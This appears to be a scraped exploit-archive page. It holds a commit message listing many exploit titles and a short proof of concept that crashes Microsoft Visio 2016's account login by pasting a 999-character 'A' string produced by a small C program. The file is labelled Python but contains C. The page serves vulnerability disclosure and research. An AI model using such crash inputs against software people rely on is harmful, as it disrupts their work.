e4e3f1c741
15 changes to exploits/shellcodes Microsoft Visio 2016 16.0.4738.1000 - 'Log in accounts' Denial of Service gnutls 3.6.6 - 'verify_crt()' Use-After-Free Microsoft Windows Task Scheduler (Windows XP/2000) - '.job' (MS04-022) Microsoft Windows Task Scheduler (XP/2000) - '.job' (MS04-022) Multiple Vendor BIOS - Keyboard Buffer Password Persistence Weakness (1) Multiple Vendor BIOS - Keyboard Buffer Password Persistence Weakness (2) Multiple Vendor BIOS - Keyboard Buffer Password Persistence (1) Multiple Vendor BIOS - Keyboard Buffer Password Persistence (2) NXP Semiconductors MIFARE Classic Smartcard - Multiple Security Weaknesses NXP Semiconductors MIFARE Classic Smartcard - Multiple Vulnerabilities Accellion Secure File Transfer Appliance - Multiple Command Restriction Weakness Privilege Escalations Accellion Secure File Transfer Appliance - Multiple Command Restriction / Privilege Escalations EncFS 1.6.0 - Flawed CBC/CFB Cryptography Implementation Weaknesses EncFS 1.6.0 - Flawed CBC/CFB Cryptography Implementation PonyOS 3.0 - VFS Permissions PonyOS 3.0 - ELF Loader Privilege Escalation PonyOS 3.0 - TTY 'ioctl()' Kernel Local Privilege Escalation Linux Kernel (PonyOS 3.0) - VFS Permissions Local Privilege Escalation Linux Kernel (PonyOS 3.0) - ELF Loader Local Privilege Escalation Linux Kernel (PonyOS 3.0) - TTY 'ioctl()' Local Privilege Escalation PonyOS 4.0 - 'fluttershy' LD_LIBRARY_PATH Kernel Privilege Escalation Linux Kernel (PonyOS 4.0) - 'fluttershy' LD_LIBRARY_PATH Local Privilege Escalation Microsoft Windows Manager (Windows 7 x86) - Menu Management Component UAF Privilege Elevation Microsoft Windows Kernel (Windows 7 x86) - Local Privilege Escalation (MS17-017) Microsoft Windows Kernel (Windows 7 x86) - Local Privilege Escalation (MS16-039) Microsoft Windows Manager (7 x86) - Menu Management Component UAF Privilege Elevation Microsoft Windows Kernel (7 x86) - Local Privilege Escalation (MS17-017) Microsoft Windows Kernel (7 x86) - Local Privilege Escalation (MS16-039) Microsoft Windows MSHTML Engine - _Edit_ Remote Code Execution Microsoft Windows MSHTML Engine - 'Edit' Remote Code Execution Base64 Decoder 1.1.2 - Local Buffer Overflow (SEH Egghunter) Linux Kernel 2.2 - TCP/IP Weakness Spoof IP Linux Kernel 2.2 - TCP/IP Spoof IP Microsoft Windows Media Encoder (Windows XP SP2) - 'wmex.dll' ActiveX Buffer Overflow (MS08-053) Microsoft Windows Media Encoder (XP SP2) - 'wmex.dll' ActiveX Buffer Overflow (MS08-053) Qualcomm Eudora 6.0.1/6.1.1 - Attachment LaunchProtect Warning Bypass Weakness (1) Qualcomm Eudora 6.0.1/6.1.1 - Attachment LaunchProtect Warning Bypass Weakness (2) Qualcomm Eudora 6.0.1/6.1.1 - Attachment LaunchProtect Warning Bypass (1) Qualcomm Eudora 6.0.1/6.1.1 - Attachment LaunchProtect Warning Bypass (2) Microsoft Internet Explorer 5/6 / Mozilla 1.2.1 - URI Display Obfuscation Weakness (1) Microsoft Internet Explorer 5/6 / Mozilla 1.2.1 - URI Display Obfuscation Weakness (2) Microsoft Internet Explorer 5/6 / Mozilla 1.2.1 - URI Display Obfuscation (1) Microsoft Internet Explorer 5/6 / Mozilla 1.2.1 - URI Display Obfuscation (2) PHP 5.2.6 - 'create_function()' Code Injection Weakness (2) PHP 5.2.6 - 'create_function()' Code Injection Weakness (1) PHP 5.2.6 - 'create_function()' Code Injection (2) PHP 5.2.6 - 'create_function()' Code Injection (1) GNU Classpath 0.97.2 - 'gnu.java.security.util.PRNG' Class Entropy Weakness (1) GNU Classpath 0.97.2 - 'gnu.java.security.util.PRNG' Class Entropy Weakness (2) GNU Classpath 0.97.2 - 'gnu.java.security.util.PRNG' Class Entropy (1) GNU Classpath 0.97.2 - 'gnu.java.security.util.PRNG' Class Entropy (2) WebKit - Insufficient Entropy Random Number Generator Weakness (1) WebKit - Insufficient Entropy Random Number Generator Weakness (2) WebKit - Insufficient Entropy Random Number Generator (1) WebKit - Insufficient Entropy Random Number Generator (2) SonicWALL - SessId Cookie Brute Force Weakness Admin Session Hijacking SonicWALL - 'SessId' Cookie Brute Force / Admin Session Hijacking Microsoft Windows Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010) Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010) Microsoft Windows Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) Microsoft Windows Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) elFinder PHP Connector < 2.1.48 - exiftran Command Injection (Metasploit) elFinder PHP Connector < 2.1.48 - 'exiftran' Command Injection (Metasploit) Jenkins 2.137 and Pipeline Groovy Plugin 2.61 - ACL Bypass and Metaprogramming RCE (Metasploit) Jenkins 2.137 and Pipeline Groovy Plugin 2.61 - ACL Bypass and Metaprogramming Remote Code Execution (Metasploit) CMS Made Simple (CMSMS) Showtime2 - File Upload RCE (Metasploit) Oracle Weblogic Server Deserialization RCE - Raw Object (Metasploit) Typo3 3.5 b5 - HTML Hidden Form Field Information Disclosure Weakness (1) Typo3 3.5 b5 - HTML Hidden Form Field Information Disclosure Weakness (2) Typo3 3.5 b5 - HTML Hidden Form Field Information Disclosure (1) Typo3 3.5 b5 - HTML Hidden Form Field Information Disclosure (2) LemonLDAP:NG 0.9.3.1 - User Enumeration Weakness / Cross-Site Scripting LemonLDAP:NG 0.9.3.1 - User Enumeration / Cross-Site Scripting Novell Teaming 1.0 - User Enumeration Weakness / Multiple Cross-Site Scripting Vulnerabilities Novell Teaming 1.0 - User Enumeration / Multiple Cross-Site Scripting Vulnerabilities MotoCMS - admin/data/users.xml Access Restriction Weakness Information Disclosure MotoCMS - 'admin/data/users.xml' Access Restriction / Information Disclosure Coppermine Gallery < 1.5.44 - Directory Traversal Weaknesses Coppermine Gallery < 1.5.44 - Directory Traversal Tenda W308R v2 Wireless Router 5.07.48 - Cookie Session Weakness Remote DNS Change Tenda W308R v2 Wireless Router 5.07.48 - (Cookie Session) Remote DNS Change Cobub Razor 0.8.0 - Physical path Leakage Cobub Razor 0.8.0 - Physical Path Leakage Thomson Reuters Concourse & Firm Central < 2.13.0097 - Directory Traversal / Local File Inclusion Airbnb Clone Script - Multiple SQL Injection Fat Free CRM 0.19.0 - HTML Injection WordPress Plugin Anti-Malware Security and Brute-Force Firewall 4.18.63 - Local File Inclusion WordPress Plugin Loco Translate 2.2.1 - Local File Inclusion i-doit 1.12 - 'qr.php' Cross-Site Scripting Job Portal 3.1 - 'job_submit' SQL Injection BigTree 4.3.4 CMS - Multiple SQL Injection Jettweb PHP Hazır Rent A Car Sitesi Scripti V2 - 'arac_kategori_id' SQL Injection
39 lines
No EOL
1.3 KiB
Python
Executable file
39 lines
No EOL
1.3 KiB
Python
Executable file
# -⋆- coding: utf-8 -⋆-
|
|
Created on Thu Feb 21 01:32:50 2019
|
|
|
|
@author: César
|
|
"""
|
|
|
|
#Exploit Title: Microsoft Visio 2016 (16.0.4738.1000) "Log in accounts" allows go on whit email formed by one thousand A in every of its parts AAA---A@AAA--A.AAA---A
|
|
#Descovered by: César Adrián Coronado Llanos
|
|
#Descovered Date; Sun Feb 17 20:34:23 2019
|
|
#Vendor Homepage: https://www.microsoft.com
|
|
#Tested Version: 16.0.4738.1000 x64
|
|
#Tested on OS: Microsoft Windows 10 Home Single Language x64
|
|
#Versión 10.0.10240 compilación 10240
|
|
|
|
#Steps to produce the crash
|
|
#1.- Run c code: generator.c
|
|
#2.- Open the file created "letters.txt" and copy the text content to clipboard
|
|
#3.- Open Visio 2016
|
|
#4.- Click in change account or Login
|
|
#5.- In the Login paste the clipboard, typewrite @ paste again the clipboard, typewrite . and paste for last time the clipboard, clik in next
|
|
#6.- Click in professional account
|
|
#7.- Visio 2016 don't respond, however it stays in a white window and don't send us any message
|
|
|
|
Note: For do this you need internet conection.
|
|
|
|
#include<stdio.h>
|
|
int main(){
|
|
int i;
|
|
FILE *letters;
|
|
if((letters = fopen("letters.txt","w+")) != NULL){
|
|
for(i=0;i<999;i++){
|
|
fprintf(letters,"A");
|
|
}
|
|
}
|
|
fclose(letters);
|
|
printf("\tThe file was created successfully!!\n");
|
|
}
|
|
|
|
Note: This code was compiled in dev C++ |